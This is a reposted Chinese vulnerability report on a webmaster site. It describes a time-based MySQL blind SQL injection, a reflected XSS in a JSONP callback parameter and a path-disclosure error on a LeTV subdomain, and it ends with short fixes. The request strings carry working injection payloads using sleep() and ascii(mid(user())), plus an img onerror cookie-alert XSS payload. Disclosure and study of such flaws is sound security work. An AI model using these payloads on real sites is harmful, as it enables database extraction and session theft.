乐视MySQL盲注、callback反射型XSS及一处绝对路径泄_工具资源_青云站长教程网
欢迎来到站长教程网!
  • 秒到短信接口 免费试用
  • 微信支付宝接口 秒结算
  • 中文网站排名|申请加入
  • 搜索引擎全站查询
  • 查询移动网站权重数据
  • 海外主机 台湾公司直销
  • 工具资源

    当前位置:主页 > 网站运营 > 工具资源 >

    乐视MySQL盲注、callback反射型XSS及一处绝对路径泄

    时间:2019-07-10|栏目:工具资源|点击:
  • 注射点位于(参数ID):


    ?callback=jQuery171017738118954002857_1408792927555&id=1&_=1408792945702

    反射型XSS位于:

    ?callback=callback__%3Cimg%20src=aaaa%20onerror=alert(document.cookie)%3E&

    绝对路径泄漏位于:

    ?callback=aaaa&username=

    Notice: Undefined index: tel in /letv/joyearcars2014happy.hz.letv.com/php/joyearcar.php on line 11

    测试过程

    ?callback=jQuery171017738118954002857_1408792927555&id=if(length(user())>22,sleep(1),0)&_=1408792945702

    可猜解当前连接用户的长度为23。

    我只猜解了第一个字母的ASCII码为50,字母“2”:

    ?callback=jQuery171017738118954002857_1408792927555&id=if(ascii(mid(user(),1,1))=50,sleep(1),2)--&_=1408792945702

    非root,未进一步利用。
     

    letv_XSS.png

    修复方案:

    解决SQL注射

    编码callback

    不显示详细错误信息

    上一篇:U-Mail邮件服务系统最新版SQL注入漏洞 - 网站安全

    栏    目:工具资源

    下一篇:phpyun设计缺陷可用别的账户money付款,清空别的账

    本文标题:乐视MySQL盲注、callback反射型XSS及一处绝对路径泄

    本文地址:http://www.jh-floor.com/wangzhanyunying/gongjuziyuan/2030.html

    广告投放 | 联系我们 | 版权申明

    重要申明:本站所有的文章、图片、评论等,均由网友发表或上传并维护或收集自网络,属个人行为,与本站立场无关。

    如果侵犯了您的权利,请与我们联系,我们将在24小时内进行处理、任何非本站因素导致的法律后果,本站均不负任何责任。

    联系QQ:888888 | 邮箱:888888#qq.com(#换成@)

    Copyright © 2002-2017 青云站长教程网 版权所有 琼ICP备xxxxxxxx号